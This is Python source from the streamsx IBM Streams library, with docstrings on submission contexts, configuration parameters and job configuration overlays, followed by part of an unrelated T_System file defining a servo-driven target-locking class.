`Generating authentication keys for IBM Streams <https://www.ibm.com/support/knowledgecenter/SSCRJU_4.2.1/com.ibm.streams.cfg.doc/doc/ibminfospherestreams-user-security-authentication-rsa.html>`_
"""
STANDALONE = 'STANDALONE'
"""Build and execute locally.
Compiles and executes the `Topology` locally in IBM Streams standalone mode as a separate sub-process.
    Typically used for development and testing.
    The call to :py:func:`submit` returns when (if) the application completes. An application
completes when it has finite source streams and all tuples from those streams have been
processed by the complete topology. If the source streams are infinite (e.g. reading tweets)
then the standalone application will not complete.
Environment variables:
    These environment variables define how the application is built.
    * **STREAMS_INSTALL** - Location of an IBM Streams installation (4.0.1 or later).
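    Example (illustrative sketch; requires a local IBM Streams install)::

        from streamsx.topology.topology import Topology
        from streamsx.topology.context import submit, ContextTypes

        topo = Topology('StandaloneApp')
        # ... declare finite source streams so the run completes ...
        submit(ContextTypes.STANDALONE, topo)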
"""
BUNDLE = 'BUNDLE'
"""Create a Streams application bundle.
The `Topology` is compiled to produce Streams application bundle (sab file).
The resultant application can be submitted to:
* Streaming Analytics service using the Streams console or the Streaming Analytics REST api.
* IBM Streams instance using the Streams console, JMX api or command line ``streamtool submitjob``.
* Executed standalone for development or testing.
The bundle must be built on the same operating system version and architecture as the intended running
environment. For Streaming Analytics service this is currently RedHat/CentOS 7 and `x86_64` architecture.
    .. rubric:: IBM Cloud Pak for Data integrated configuration
*Projects (within cluster)*
The `Topology` is compiled using the Streams build service for
a Streams service instance running in the same Cloud Pak for
Data cluster as the Jupyter notebook or script declaring the application.
The instance is specified in the configuration passed into :py:func:`submit`. The code that selects a service instance by name is::
from icpd_core import icpd_util
cfg = icpd_util.get_service_instance_details(name='instanceName', instance_type="streams")
topo = Topology()
...
submit(ContextTypes.BUNDLE, topo, cfg)
The resultant `cfg` dict may be augmented with other values such as
keys from :py:class:`ConfigParams`.
*External to cluster or project*
The `Topology` is compiled using the Streams build service for a Streams service instance running in Cloud Pak for Data.
Environment variables:
These environment variables define how the application is built and submitted.
* **CP4D_URL** - Cloud Pak for Data deployment URL, e.g. `https://cp4d_server:31843`
* **STREAMS_INSTANCE_ID** - Streams service instance name.
* **STREAMS_USERNAME** - (optional) User name to submit the job as, defaulting to the current operating system user name.
* **STREAMS_PASSWORD** - Password for authentication.
.. rubric:: IBM Cloud Pak for Data standalone configuration
The `Topology` is compiled using the Streams build service.
Environment variables:
These environment variables define how the application is built.
* **STREAMS_BUILD_URL** - Streams build service URL, e.g. when the service is exposed as node port: `https://<NODE-IP>:<NODE-PORT>`
* **STREAMS_USERNAME** - (optional) User name to submit the job as, defaulting to the current operating system user name.
* **STREAMS_PASSWORD** - Password for authentication.
.. rubric:: IBM Streams on-premise 4.2 & 4.3
The `Topology` is compiled using a local IBM Streams installation.
Environment variables:
These environment variables define how the application is built.
* **STREAMS_INSTALL** - Location of a local IBM Streams installation.
"""
TOOLKIT = 'TOOLKIT'
"""Creates an SPL toolkit.
    `Topology` applications are implemented as an SPL application before compilation into a Streams application
bundle. This context type produces the intermediate SPL toolkit that is input to the SPL compiler for
bundle creation.
.. note::
`TOOLKIT` is typically only used when diagnosing issues with bundle generation.
"""
BUILD_ARCHIVE = 'BUILD_ARCHIVE'
"""Creates a build archive.
This context type produces the intermediate code archive used for bundle creation.
.. note::
`BUILD_ARCHIVE` is typically only used when diagnosing issues with bundle generation.
"""
EDGE = 'EDGE'
"""Submission to build service running on IBM Cloud Pak for Data to create an image for Edge.
The `Topology` is compiled and the resultant Streams application bundle
(sab file) is added to an image for Edge.
    .. rubric:: IBM Cloud Pak for Data integrated configuration
*Projects (within cluster)*
The `Topology` is compiled using the Streams build service for
a Streams service instance running in the same Cloud Pak for
Data cluster as the Jupyter notebook or script declaring the application.
The instance is specified in the configuration passed into :py:func:`submit`. The code that selects a service instance by name is::
from streamsx.topology.context import submit, ContextTypes
from icpd_core import icpd_util
cfg = icpd_util.get_service_instance_details(name='instanceName', instance_type="streams")
topo = Topology()
...
submit(ContextTypes.EDGE, topo, cfg)
The resultant `cfg` dict may be augmented with other values such as
keys from :py:class:`ConfigParams` or :py:class:`JobConfig`.
For example, apply `imageName` and `imageTag`::
from streamsx.topology.context import submit, ContextTypes, JobConfig
from icpd_core import icpd_util
cfg = icpd_util.get_service_instance_details(name='instanceName', instance_type="streams")
topo = Topology()
...
jc = JobConfig()
jc.raw_overlay = {'edgeConfig': {'imageName':'py-sample-app', 'imageTag':'v1.0'}}
jc.add(cfg)
submit(ContextTypes.EDGE, topo, cfg)
*External to cluster or project*
The `Topology` is compiled using the Streams build service for a Streams service instance running in Cloud Pak for Data.
Environment variables:
These environment variables define how the application is built and submitted.
* **CP4D_URL** - Cloud Pak for Data deployment URL, e.g. `https://cp4d_server:31843`
* **STREAMS_INSTANCE_ID** - Streams service instance name.
* **STREAMS_USERNAME** - (optional) User name to submit the job as, defaulting to the current operating system user name.
* **STREAMS_PASSWORD** - Password for authentication.
Example code to query the base images::
from streamsx.build import BuildService
bs = BuildService.of_endpoint(verify=False)
baseImages = bs.get_base_images()
print('# images = ' + str(len(baseImages)))
for i in baseImages:
print(i.id)
print(i.registry)
Example code to select a base image for the image build::
from streamsx.topology.context import submit, ContextTypes, JobConfig
topo = Topology()
...
jc = JobConfig()
jc.raw_overlay = {'edgeConfig': {'imageName':'py-sample-app', 'imageTag':'v1.0', 'baseImage':'streams-base-edge-python-el7:5.3.0.0'}}
jc.add(cfg)
submit(ContextTypes.EDGE, topo, cfg)
.. rubric:: EDGE configuration
The dict *edgeConfig* supports the following fields that are used for the image creation:
* **imageName** - [str] name of the image
* **imageTag** - [str] name of the image tag
* **baseImage** - [str] identify the name of the base image
* **pipPackages** - [list] identify one or more Python install packages that are to be included in the image.
* **rpms** - [list] identify one or more linux RPMs that are to be included in the image
    * **locales** - [list] identify one or more locales that are to be included in the image. The first item in the list is the "default" locale. The locales are identified in the Java format <language>_<country>_<variant>. Example: "en_US"
Example with adding pip packages and rpms::
jc.raw_overlay = {'edgeConfig': {'imageName': image_name, 'imageTag': image_tag, 'pipPackages':['pandas','numpy'], 'rpms':['atlas-devel']}}
"""
EDGE_BUNDLE = 'EDGE_BUNDLE'
"""Creates a Streams application bundle.
The `Topology` is compiled on build service running on IBM Cloud Pak for Data and the resultant Streams application bundle
(sab file) is downloaded.
.. note::
`EDGE_BUNDLE` is typically only used when diagnosing issues with applications for EDGE.
"""
class ConfigParams(object):
"""
Configuration options which may be used as keys in :py:func:`submit` `config` parameter.
"""
VCAP_SERVICES = 'topology.service.vcap'
"""Streaming Analytics service definitions including credentials in **VCAP_SERVICES** format.
Provides the connection credentials when connecting to a Streaming Analytics service
using context type :py:const:`~ContextTypes.STREAMING_ANALYTICS_SERVICE`.
The ``streaming-analytics`` service to use within the service definitions is identified
by name using :py:const:`SERVICE_NAME`.
The key overrides the environment variable **VCAP_SERVICES**.
The value can be:
* Path to a local file containing a JSON representation of the VCAP services information.
* Dictionary containing the VCAP services information.
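    Example (illustrative; the path and service name are placeholders)::

        cfg = {}
        cfg[ConfigParams.VCAP_SERVICES] = '/home/user/vcap_services.json'
        cfg[ConfigParams.SERVICE_NAME] = 'My-Streaming-Analytics'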
.. seealso:: :ref:`sas-vcap`
"""
SERVICE_NAME = 'topology.service.name'
"""Streaming Analytics service name.
Selects the specific Streaming Analytics service from VCAP service definitions
    defined by the environment variable **VCAP_SERVICES** or the key :py:const:`VCAP_SERVICES` in the `submit` config.
.. seealso:: :ref:`sas-service-name`
"""
SPACE_NAME = 'topology.spaceName'
"""
    Key for a deployment space on Cloud Pak for Data, used when submitting to :py:const:`DISTRIBUTED`.
When a space name is specified for an application submitted from a project in Cloud Pak for Data,
for example from a Jupyter notebook, the resulting job will not be associated with the project and can
therefore not be found within the project. The job will be associated with a deployment space instead.
When the specified space does not exist, it will be automatically created.
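    Example (illustrative; the space name and topology are placeholders)::

        cfg[ConfigParams.SPACE_NAME] = 'my-deployment-space'
        submit(ContextTypes.DISTRIBUTED, topo, cfg)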
.. versionadded:: 1.17
"""
CP4D_URL = 'topology.cp4d_url'
"""
    Key for specifying the URL of the Cloud Pak for Data deployment, used when submitting to :py:const:`DISTRIBUTED` from within a CP4D project.
.. versionadded:: 1.17
"""
FORCE_REMOTE_BUILD = 'topology.forceRemoteBuild'
"""Force a remote build of the application.
When submitting to :py:const:`STREAMING_ANALYTICS_SERVICE` a local build of the Streams application bundle
will occur if the environment variable **STREAMS_INSTALL** is set. Setting this flag to `True` ignores the
local Streams install and forces the build to occur remotely using the service.
"""
JOB_CONFIG = 'topology.jobConfigOverlays'
"""
Key for a :py:class:`JobConfig` object representing a job configuration for a submission.
"""
STREAMS_CONNECTION = 'topology.streamsConnection'
"""
Key for a :py:class:`StreamsConnection` object for connecting to a running IBM Streams instance. Only supported for Streams 4.2, 4.3. Requires environment
variable ``STREAMS_INSTANCE_ID`` to be set.
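    Example (illustrative sketch; the credentials are placeholders and
    ``STREAMS_INSTANCE_ID`` must be set in the environment)::

        from streamsx.rest import StreamsConnection

        sc = StreamsConnection(username='streamsadmin', password='passw0rd')
        cfg = {ConfigParams.STREAMS_CONNECTION: sc}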
"""
SSL_VERIFY = 'topology.SSLVerify'
"""
Key for the SSL verification value passed to `requests` as its ``verify``
option for distributed contexts. By default set to `True`.
.. note:: Only ``True`` or ``False`` is supported. Behaviour is undefined
when passing a path to a CA_BUNDLE file or directory with
certificates of trusted CAs.
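    Example (illustrative; disables certificate verification for a distributed submission)::

        cfg = {}
        cfg[ConfigParams.SSL_VERIFY] = False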
.. versionadded:: 1.11
"""
SERVICE_DEFINITION = 'topology.service.definition'
"""Streaming Analytics service definition.
Identifies the Streaming Analytics service to use. The definition can be one of
* The `service credentials` copied from the `Service credentials` page of the service console (not the Streams console).
    Credentials are provided in JSON format. They contain values such as the API key and secret, as well as connection information for the service.
* A JSON object (`dict`) created from the `service credentials`, for example with `json.loads(service_credentials)`
* A JSON object (`dict`) of the form: ``{ "type": "streaming-analytics", "name": "service name", "credentials": ... }``
with the `service credentials` as the value of the ``credentials`` key. The value of the ``credentials`` key can
be a JSON object (`dict`) or a `str` copied from the `Service credentials` page of the service console.
This key takes precedence over :py:const:`VCAP_SERVICES` and :py:const:`SERVICE_NAME`.
.. seealso:: :ref:`sas-service-def`
"""
SC_OPTIONS = 'topology.sc.options'
"""
Options to be passed to IBM Streams sc command.
A topology is compiled into a Streams application
bundle (`sab`) using the SPL compiler ``sc``.
Additional options to be passed to ``sc``
may be set using this key. The value can be a
single string option (e.g. ``--c++std=c++11`` to select C++ 11 compilation)
or a list of strings for multiple options.
Setting ``sc`` options may be required when invoking SPL operators
directly or testing SPL applications.
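    Example (illustrative; uses the ``--c++std=c++11`` option mentioned above)::

        cfg = {}
        cfg[ConfigParams.SC_OPTIONS] = '--c++std=c++11'
        # or, equivalently, as a list of options
        cfg[ConfigParams.SC_OPTIONS] = ['--c++std=c++11']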
.. warning::
Options that modify the requested submission context (e.g. setting
a different main composite) or deprecated options should not be specified.
.. versionadded:: 1.12.10
"""
_SPLMM_OPTIONS = 'topology.internal.splmm_options'
"""
TBD
"""
class JobConfig(object):
"""
Job configuration.
    `JobConfig` allows configuration of the job that will result from
submission of a :py:class:`Topology` (application).
A `JobConfig` is set in the `config` dictionary passed to :py:func:`~streamsx.topology.context.submit`
using the key :py:const:`~ConfigParams.JOB_CONFIG`. :py:meth:`~JobConfig.add` exists as a convenience
method to add it to a submission configuration.
A `JobConfig` can also be used when submitting a Streams application
bundle through the Streaming Analytics REST API method :py:meth:`~streamsx.rest_primitives.StreamingAnalyticsService.submit_job`.
Args:
        job_name(str): The name that is assigned to the job. A job name must be unique within a Streams instance.
When set to `None` a system generated name is used.
job_group(str): The job group to use to control permissions for the submitted job.
preload(bool): Specifies whether to preload the job onto all resources in the instance, even if the job is
not currently needed on each. Preloading the job can improve PE restart performance if the PEs are
relocated to a new resource.
data_directory(str): Specifies the location of the optional data directory. The data directory is a path
within the cluster that is running the Streams instance.
tracing: Specify the application trace level. See :py:attr:`tracing`
space_name(str): Specifies the name of a deployment space on a Cloud Pak for Data system that the job is associated with.
Example::
# Submit a job with the name NewsIngester
cfg = {}
job_config = JobConfig(job_name='NewsIngester')
job_config.add(cfg)
context.submit('STREAMING_ANALYTICS_SERVICE', topo, cfg)
.. seealso:: `Job configuration overlays reference <https://www.ibm.com/support/knowledgecenter/en/SSCRJU_4.2.1/com.ibm.streams.ref.doc/doc/submitjobparameters.html>`_
"""
def __init__(self, job_name=None, job_group=None, preload=False, data_directory=None, tracing=None, space_name=None):
self.job_name = job_name
self.job_group = job_group
self.preload = preload
self.data_directory = data_directory
self.tracing = tracing
self._space_name = space_name
self._pe_count = None
self._raw_overlay = None
self._submission_parameters = dict()
self._comment = None
@staticmethod
def from_overlays(overlays):
"""Create a `JobConfig` instance from a full job configuration
overlays object.
All logical items, such as ``comment`` and ``job_name``, are
extracted from `overlays`. The remaining information in the
single job config overlay in ``overlays`` is set as ``raw_overlay``.
Args:
overlays(dict): Full job configuration overlays object.
Returns:
JobConfig: Instance representing logical view of `overlays`.
.. versionadded:: 1.9
"""
jc = JobConfig()
jc.comment = overlays.get('comment')
if 'jobConfigOverlays' in overlays:
if len(overlays['jobConfigOverlays']) >= 1:
jco = copy.deepcopy(overlays['jobConfigOverlays'][0])
# Now extract the logical information
if 'jobConfig' in jco:
_jc = jco['jobConfig']
jc.job_name = _jc.pop('jobName', None)
jc.job_group = _jc.pop('jobGroup', None)
jc.preload = _jc.pop('preloadApplicationBundles', False)
jc.data_directory = _jc.pop('dataDirectory', None)
jc.tracing = _jc.pop('tracing', None)
for sp in _jc.pop('submissionParameters', []):
jc.submission_parameters[sp['name']] = sp['value']
if not _jc:
del jco['jobConfig']
if 'deploymentConfig' in jco:
_dc = jco['deploymentConfig']
if 'manual' == _dc.get('fusionScheme'):
if 'fusionTargetPeCount' in _dc:
jc.target_pe_count = _dc.pop('fusionTargetPeCount')
if len(_dc) == 1:
del jco['deploymentConfig']
if jco:
jc.raw_overlay = jco
return jc
@property
def space_name(self):
"""
The deployment space of a Cloud Pak for Data system that the job will be associated with.
"""
return self._space_name
@space_name.setter
def space_name(self, space_name):
self._space_name = space_name
@property
def tracing(self):
"""
Runtime application trace level.
The runtime application trace level can be a string with value ``error``, ``warn``, ``info``,
``debug`` or ``trace``.
In addition, a level from the Python ``logging`` module can be used, with ``CRITICAL`` and ``ERROR`` mapping
to ``error``, ``WARNING`` to ``warn``, ``INFO`` to ``info`` and ``DEBUG`` to ``debug``.
Setting tracing to `None` or ``logging.NOTSET`` will result in the job submission using the Streams instance
application trace level.
The value of ``tracing`` is the level as a string (``error``, ``warn``, ``info``, ``debug`` or ``trace``)
or None.
"""
return self._tracing
@tracing.setter
def tracing(self, level):
if level is None:
pass
elif level in {'error', 'warn', 'info', 'debug', 'trace'}:
pass
elif level == logging.CRITICAL or level == logging.ERROR:
level = 'error'
elif level == logging.WARNING:
level = 'warn'
elif level == logging.INFO:
level = 'info'
elif level == logging.DEBUG:
level = 'debug'
elif level == logging.NOTSET:
level = None
else:
raise ValueError("Tracing value {0} not supported.".format(level))
self._tracing = level
@property
def target_pe_count(self):
"""Target processing element count.
When submitted against a Streams instance `target_pe_count` provides
a hint to the scheduler as to how to partition the topology
across processing elements (processes) for the job execution. When a job
contains multiple processing elements (PEs) then the Streams scheduler can
distribute the PEs across the resources (hosts) running in the instance.
When set to ``None`` (the default) no hint is supplied to the scheduler.
The number of PEs in the submitted job will be determined by the scheduler.
The value is only a target and may be ignored when the topology contains
:py:meth:`~Stream.isolate` calls.
.. note::
Only supported in Streaming Analytics service and IBM Streams 4.2 or later.
"""
if self._pe_count is None:
return None
return int(self._pe_count)
@target_pe_count.setter
def target_pe_count(self, count):
if count is not None:
count = int(count)
if count < 1:
raise ValueError("target_pe_count must be greater than 0.")
self._pe_count = count
@property
def raw_overlay(self):
"""Raw Job Config Overlay.
A submitted job is configured using Job Config Overlay which
is represented as JSON. `JobConfig` exposes the Job Config Overlay
logically with properties such as ``job_name`` and ``tracing``.
This property (as a ``dict``) allows merging of the
configuration defined by this object and raw representation
of a Job Config Overlay. This can be used when a capability
of Job Config Overlay is not exposed logically through this class.
For example, the threading model can be set by::
jc = streamsx.topology.context.JobConfig()
jc.raw_overlay = {'deploymentConfig': {'threadingModel': 'manual'}}
Any logical items set by this object **overwrite** any set with
``raw_overlay``. For example this sets the job name
to the value set in the constructor (`DBIngest`), not the value
in ``raw_overlay`` (`Ingest`)::
jc = streamsx.topology.context.JobConfig(job_name='DBIngest')
jc.raw_overlay = {'jobConfig': {'jobName': 'Ingest'}}
.. note:: The contents of ``raw_overlay`` must be a ``dict`` that
matches a single Job Config Overlay and is serializable
as JSON in the correct format.
.. seealso:: `Job Config Overlay reference <https://www.ibm.com/support/knowledgecenter/en/SSCRJU_4.2.1/com.ibm.streams.ref.doc/doc/submitjobparameters.html>`_
.. versionadded:: 1.9
"""
return self._raw_overlay
@raw_overlay.setter
def raw_overlay(self, raw):
self._raw_overlay = raw
@property
def submission_parameters(self):
"""Job submission parameters.
Submission parameters values for the job. A `dict` object
that maps submission parameter names to values.
.. versionadded:: 1.9
"""
return self._submission_parameters
@property
def comment(self):
"""
Comment for job configuration.
The comment does not change the functionality of the job configuration.
Returns:
str: Comment text, `None` if it has not been set.
.. versionadded:: 1.9
"""
return self._comment
@comment.setter
def comment(self, value):
if value:
self._comment = str(value)
else:
self._comment = None
def add(self, config):
"""
Add this `JobConfig` into a submission configuration object.
Args:
config(dict): Submission configuration.
Returns:
dict: config.
"""
config[ConfigParams.JOB_CONFIG] = self
if self.space_name:
config[ConfigParams.SPACE_NAME] = self.space_name
return config
def as_overlays(self):
"""Return this job configuration as a complete job configuration overlays object.
Converts this job configuration into the full format supported by IBM Streams.
The returned `dict` contains:
* ``jobConfigOverlays`` key with an array containing a single job configuration overlay.
* an optional ``comment`` key containing the comment ``str``.
For example with this ``JobConfig``::
jc = JobConfig(job_name='TestIngester')
jc.comment = 'Test configuration'
jc.target_pe_count = 2
the returned `dict` would be::
{"comment": "Test configuration",
"jobConfigOverlays":
[{"jobConfig": {"jobName": "TestIngester"},
"deploymentConfig": {"fusionTargetPeCount": 2, "fusionScheme": "manual"}}]}
The returned overlays object can be saved as JSON in a file
using ``json.dump``. A file can be used with job submission
mechanisms that support a job config overlays file, such as
``streamtool submitjob`` or the IBM Streams console.
Example of saving a ``JobConfig`` instance as a file::
jc = JobConfig(job_name='TestIngester')
with open('jobconfig.json', 'w') as f:
json.dump(jc.as_overlays(), f)
Returns:
dict: Complete job configuration overlays object built from this object.
.. versionadded:: 1.9
"""
return self._add_overlays({})
def _add_overlays(self, config):
"""
Add this as a jobConfigOverlays JSON to config.
"""
if self._comment:
config['comment'] = self._comment
jco = {}
config["jobConfigOverlays"] = [jco]
if self._raw_overlay:
jco.update(self._raw_overlay)
jc = jco.get('jobConfig', {})
if self.job_name is not None:
jc["jobName"] = self.job_name
if self.job_group is not None:
jc["jobGroup"] = self.job_group
if self.data_directory is not None:
jc["dataDirectory"] = self.data_directory
if self.preload:
jc['preloadApplicationBundles'] = True
if self.tracing is not None:
jc['tracing'] = self.tracing
if self.submission_parameters:
sp = jc.get('submissionParameters', [])
for name in self.submission_parameters:
sp.append({'name': str(name), 'value': self.submission_parameters[name]})
jc['submissionParameters'] = sp
if jc:
jco["jobConfig"] = jc
if self.target_pe_count is not None and self.target_pe_count >= 1:
deployment = jco.get('deploymentConfig', {})
deployment.update({'fusionScheme' : 'manual', 'fusionTargetPeCount' : self.target_pe_count})
jco["deploymentConfig"] = deployment
return config
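# Illustrative sketch (not part of the original module): building a JobConfig
# with a submission parameter and a PE count hint, then inspecting the
# generated overlays JSON. The parameter name 'period' is an assumption used
# only for demonstration.
def _example_job_config_overlays():
    jc = JobConfig(job_name='Example', tracing='debug')
    jc.submission_parameters['period'] = 5
    jc.target_pe_count = 2
    return jc.as_overlays()
    # -> {'jobConfigOverlays': [
    #        {'jobConfig': {'jobName': 'Example', 'tracing': 'debug',
    #                       'submissionParameters': [{'name': 'period', 'value': 5}]},
    #         'deploymentConfig': {'fusionScheme': 'manual', 'fusionTargetPeCount': 2}}]}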
class SubmissionResult(object):
"""Passed back to the user after a call to submit.
Allows the user to use dot notation to access dictionary elements.
Example accessing result files when using :py:const:`~ContextTypes.BUNDLE`::
submission_result = submit(ContextTypes.BUNDLE, topology, config)
print(submission_result.bundlePath)
...
os.remove(submission_result.bundlePath)
os.remove(submission_result.jobConfigPath)
Result contains the generated toolkit location when using :py:const:`~ContextTypes.TOOLKIT`::
submission_result = submit(ContextTypes.TOOLKIT, topology, config)
print(submission_result.toolkitRoot)
Result when using :py:const:`~ContextTypes.DISTRIBUTED` depends if the `Topology` is compiled locally and the resultant Streams application bundle
(sab file) is submitted to an IBM Streams instance, or if the `Topology` is compiled on the build service and submitted to an instance in Cloud Pak for Data::
submission_result = submit(ContextTypes.DISTRIBUTED, topology, config)
print(submission_result)
Result contains the generated `image`, `imageDigest`, `submitMetrics` (building the bundle), `submitImageMetrics` (building the image) when using :py:const:`~ContextTypes.EDGE`::
submission_result = submit(ContextTypes.EDGE, topology, config)
print(submission_result.image)
print(submission_result.imageDigest)
"""
def __init__(self, results):
self.results = results
self._submitter = None
@property
def job(self):
"""REST binding for the job associated with the submitted build.
Returns:
Job: REST binding for running job or ``None`` if connection information was not available or no job was submitted.
"""
if self._submitter and hasattr(self._submitter, '_job_access'):
return self._submitter._job_access()
return None
def cancel_job_button(self, description=None):
"""Display a button that will cancel the submitted job.
Used in a Jupyter IPython notebook to provide an interactive
mechanism to cancel a job submitted from the notebook.
Once clicked the button is disabled unless the cancel fails.
A job may be cancelled directly using::
submission_result = submit(ctx_type, topology, config)
submission_result.job.cancel()
Args:
description(str): Text used as the button description, defaults to a value based upon the job name.
.. warning::
Behavior when called outside a notebook is undefined.
.. versionadded:: 1.12
"""
if not hasattr(self, 'jobId'):
return
try:
# Verify we are in an IPython env.
get_ipython() # noqa : F821
import ipywidgets as widgets
if not description:
description = 'Cancel job: '
description += self.name if hasattr(self, 'name') else self.job.name
button = widgets.Button(description=description,
button_style='danger',
layout=widgets.Layout(width='40%'))
out = widgets.Output()
vb = widgets.VBox([button, out])
@out.capture(clear_output=True)
def _cancel_job_click(b):
b.disabled=True
print('Cancelling job: id=' + str(self.job.id) + ' ...\n', flush=True)
try:
rc = self.job.cancel()
out.clear_output()
if rc:
print('Cancelled job: id=' + str(self.job.id) + ' : ' + self.job.name + '\n', flush=True)
else:
print('Job already cancelled: id=' + str(self.job.id) + ' : ' + self.job.name + '\n', flush=True)
except:
b.disabled=False
out.clear_output()
raise
button.on_click(_cancel_job_click)
display(vb) # noqa : F821
except:
pass
def __getattr__(self, key):
if key in self.__getattribute__("results"):
return self.results[key]
return self.__getattribute__(key)
def __setattr__(self, key, value):
if "results" in self.__dict__:
results = self.results
results[key] = value
else:
super(SubmissionResult, self).__setattr__(key, value)
def __getitem__(self, item):
return self.__getattr__(item)
def __setitem__(self, key, value):
return self.__setattr__(key, value)
def __delitem__(self, key):
if key in self.__getattribute__("results"):
del self.results[key]
return
self.__delattr__(key)
def __contains__(self, item):
return item in self.results
def __repr__(self):
r = copy.copy(self.results)
if 'streamsConnection' in r:
del r['streamsConnection']
return r.__repr__()
def _vcap_from_service_definition(service_def):
"""Turn a service definition into a vcap services
containing a single service.
"""
if 'credentials' in service_def:
credentials = service_def['credentials']
else:
credentials = service_def
service = {}
service['credentials'] = credentials if isinstance(credentials, dict) else json.loads(credentials)
service['name'] = _name_from_service_definition(service_def)
vcap = {'streaming-analytics': [service]}
return vcap
def _name_from_service_definition(service_def):
return service_def['name'] if 'credentials' in service_def else 'service'
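# Illustrative sketch (not part of the original module): how a service
# definition carrying embedded credentials is folded into a single-service
# VCAP structure. The name and credential values are placeholder assumptions.
def _example_vcap_from_definition():
    service_def = {'name': 'my-streaming-service',
                   'credentials': {'apikey': '<api-key>'}}
    return _vcap_from_service_definition(service_def)
    # -> {'streaming-analytics': [{'credentials': {'apikey': '<api-key>'},
    #                              'name': 'my-streaming-service'}]}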
class _SasBundleSubmitter(_BaseSubmitter):
"""
A submitter which supports the BUNDLE context
for Streaming Analytics service.
"""
def __init__(self, config, graph):
_BaseSubmitter.__init__(self, 'SAS_BUNDLE', config, graph)
self._remote = config.get(ConfigParams.FORCE_REMOTE_BUILD) or \
'STREAMS_INSTALL' not in os.environ
def _get_java_env(self):
"Set env vars from connection if set"
env = super(_SasBundleSubmitter, self)._get_java_env()
env.pop('STREAMS_DOMAIN_ID', None)
env.pop('STREAMS_INSTANCE_ID', None)
env.pop('STREAMS_INSTALL', None)
return env
def run(topology, config=None, job_name=None, verify=None, ctxtype=ContextTypes.DISTRIBUTED):
"""
Run a topology in a distributed Streams instance.
Runs a topology using :py:func:`submit` with context type :py:const:`~ContextTypes.DISTRIBUTED` (by default). The result is a running Streams job.
Args:
topology(Topology): Application topology to be run.
config(dict): Configuration for the build.
job_name(str): Optional job name. If set will override any job name in `config`.
verify: SSL verification used by requests when using a build service. Defaults to enabling SSL verification.
ctxtype(str): Context type for submission.
Returns:
2-element tuple containing
- **job** (*Job*): REST binding object for the running job or ``None`` if no job was submitted.
- **result** (*SubmissionResult*): value returned from ``submit``.
.. seealso:: :py:const:`~ContextTypes.DISTRIBUTED` for details on how to configure the Streams instance to use.
.. versionadded:: 1.14
"""
config = config.copy() if config else dict()
if job_name:
if ConfigParams.JOB_CONFIG in config:
# Ensure the original is not changed
jc = JobConfig.from_overlays(config[ConfigParams.JOB_CONFIG].as_overlays())
jc.job_name = job_name
jc.add(config)
else:
JobConfig(job_name=job_name).add(config)
if verify is not None:
config[ConfigParams.SSL_VERIFY] = verify
sr = submit(ctxtype, topology, config=config)
return sr.job, sr
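# Illustrative sketch (not part of the original module): submitting an existing
# Topology with `run`, overriding the job name and disabling SSL verification.
# 'topo' is assumed to be an already built streamsx Topology.
def _example_run(topo):
    job, result = run(topo, job_name='SampleJob', verify=False)
    return job, result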
|
__init__.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: locking_system
:platform: Unix
:synopsis: the top-level submodule of T_System that contains the classes related to T_System's Target Locking System.
.. moduleauthor:: Cem Baybars GÜÇLÜ <cem.baybars@gmail.com>
"""
import threading
from math import pi
from t_system.motion.locking_system.collimator import Collimator
from t_system import arm
from t_system import log_manager
logger = log_manager.get_logger(__name__, "DEBUG")
class LockingSystem:
"""Class to define a target locking system of the t_system's motion ability.
This class provides necessary initiations and a function named :func:`t_system.motion.LockingSystem.lock`
to provide movement of the servo motors while locking onto the target.
"""
def __init__(self, args, frame_w_h, decider=None, init_angles=(pi/2, pi/3)):
"""Initialization method of :class:`t_system.motion.LockingSystem` class.
Args:
args: Command-line arguments.
frame_w_h (tuple): Tuple that contains the width and height of the vision limits.
decider: Object of the Decider class.
init_angles: Initial angles of the pan and tilt servo motors, in radians.
"""
self.frame_width = frame_w_h[0]
self.frame_height = frame_w_h[1]
self.frame_middle_x = self.frame_width / 2 - 1
self.frame_middle_y = self.frame_height / 2 - 1
self.decider = decider
self.current_k_fact = 0.01
self.pan = Collimator((args["ls_gpios"][0], args["ls_channels"][0]), self.frame_width, init_angles[0], False, use_ext_driver=args["ext_servo_driver"]) # pan rotates right and left.
self.tilt = Collimator((args["ls_gpios"][1], args["ls_channels"][1]), self.frame_height, init_angles[1], False, use_ext_driver=args["ext_servo_driver"]) # tilt rotates up and down.
self.current_target_obj_width = 0
self.locker = None
self.lock = None
self.check_error = None
self.get_physically_distance = None
self.scan_thread_stop = False
self.load_locker(args["AI"], args["non_moving_target"], args["arm_expansion"], init_angles)
def load_locker(self, ai, non_moving_target, arm_expansion, current_angles):
"""Method to set locking system's locker as given AI and target object status parameters.
Args:
ai (str): AI type that will be used while locking onto the target.
non_moving_target (bool): Non-moving target flag.
arm_expansion (bool): Flag for the loading locker as expansion of the T_System's robotic arm.
current_angles (list): Current angles of the target locking system's collimators.
"""
if arm_expansion is False:
self.pan.restart(current_angles[0])
self.tilt.restart(current_angles[1])
if ai == "official_ai":
self.locker = self.OfficialAILocker(self)
self.lock = self.locker.lock
self.check_error = self.locker.check_error
self.get_physically_distance = self.locker.get_physically_distance
elif non_moving_target or arm_expansion:
self.locker = self.ArmExpansionLocker(self)
self.lock = self.locker.lock
self.get_physically_distance = self.locker.get_physically_distance
else:
self.locker = self.RegularLocker(self)
self.lock = self.locker.lock
self.get_physically_distance = self.locker.get_physically_distance
return [self.tilt.current_angle, self.pan.current_angle]
class OfficialAILocker:
"""Class to define a official AI method of the t_system's motion ability.
This class provides necessary initiations and a function named
:func:`t_system.motion.LockingSystem.OfficialAILocker.lock`
to provide movement of the servo motors while locking onto the target.
"""
def __init__(self, locking_system):
"""Initialization method of :class:`t_system.motion.LockingSystem.OfficialAILocker` class.
Args:
locking_system: The LockingSystem Object.
"""
self.root_system = locking_system
self.decider = self.root_system.decider
self.current_k_fact = 0.01
self.current_target_obj_width = 0
if arm.is_expanded():
self.root_system.pan.restart()
self.root_system.tilt.restart()
def lock(self, x, y, w, h):
"""Method for locking to the target in the frame.
Args:
x : the column number of the top-left point of the object found by the Haar cascade.
y : the row number of the top-left point of the object found by the Haar cascade.
w : the width of the object found by the Haar cascade.
h : the height of the object found by the Haar cascade.
"""
# obj_width is equal to w
self.current_target_obj_width = w
self.current_k_fact = self.__get_k_fact(w)
self.root_system.pan.move(x, x + w, w, self.current_k_fact)
self.root_system.tilt.move(y, y + h, w, self.current_k_fact)
def check_error(self, ex, ey, ew, eh):
"""Method for checking error during locking to the target in the frame.
Args:
ex : the column number of the top-left point of the object found by the Haar cascade.
ey : the row number of the top-left point of the object found by the Haar cascade.
ew : the width of the object found by the Haar cascade.
